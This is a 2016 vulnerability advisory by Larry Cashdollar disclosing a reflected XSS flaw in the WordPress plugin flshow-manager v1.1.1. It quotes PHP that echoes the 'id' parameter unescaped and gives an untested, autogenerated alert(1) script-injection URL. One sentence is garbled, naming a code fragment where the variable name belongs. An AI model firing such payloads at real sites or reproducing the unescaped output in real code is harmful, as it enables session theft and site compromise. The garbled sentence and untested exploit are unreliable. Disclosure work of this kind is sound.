Advisory #: 410
Title: Reflected XSS in wordpress plugin flshow-manager v1.1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/flshow-manager
Downloads: 5637
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: flshow-manager
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./flshow-manager/flshow.php: 495: <td><a href="<?php $this->media_upload_url( 'images' ); ?>&amp;id=<?php echo $_GET[ 'id' ]; ?>&amp;dequeue-existing=<?php echo $upload->ID; ?>" class="button-secondary dequeue-existing" id="dequeue-<?php echo $upload->ID; ?>">- <?php _e( 'Remove' ); ?></a></td> 513: <td class="enqueue-column"><a href="<?php $this->media_upload_url( 'images' ); ?>&amp;id=<?php echo $_GET[ 'id' ]; ?>&amp;enqueue-existing=<?php echo $upload->ID; ?>" class="button-secondary enqueue-existing" id="existing-<?php echo $upload->ID; ?>">+ <?php _e( 'Add' ); ?></a></td> The variable id' ]; ?>&amp;dequeue-existing=<?php echo $upload->ID; ?>" class="button-secondary dequeue-existing" id="dequeue-<?php echo $upload->ID; ?>">- <?php _e( appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./flshow-manager/flshow.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/flshow-manager/flshow.php?id="><script>alert(1);</script><"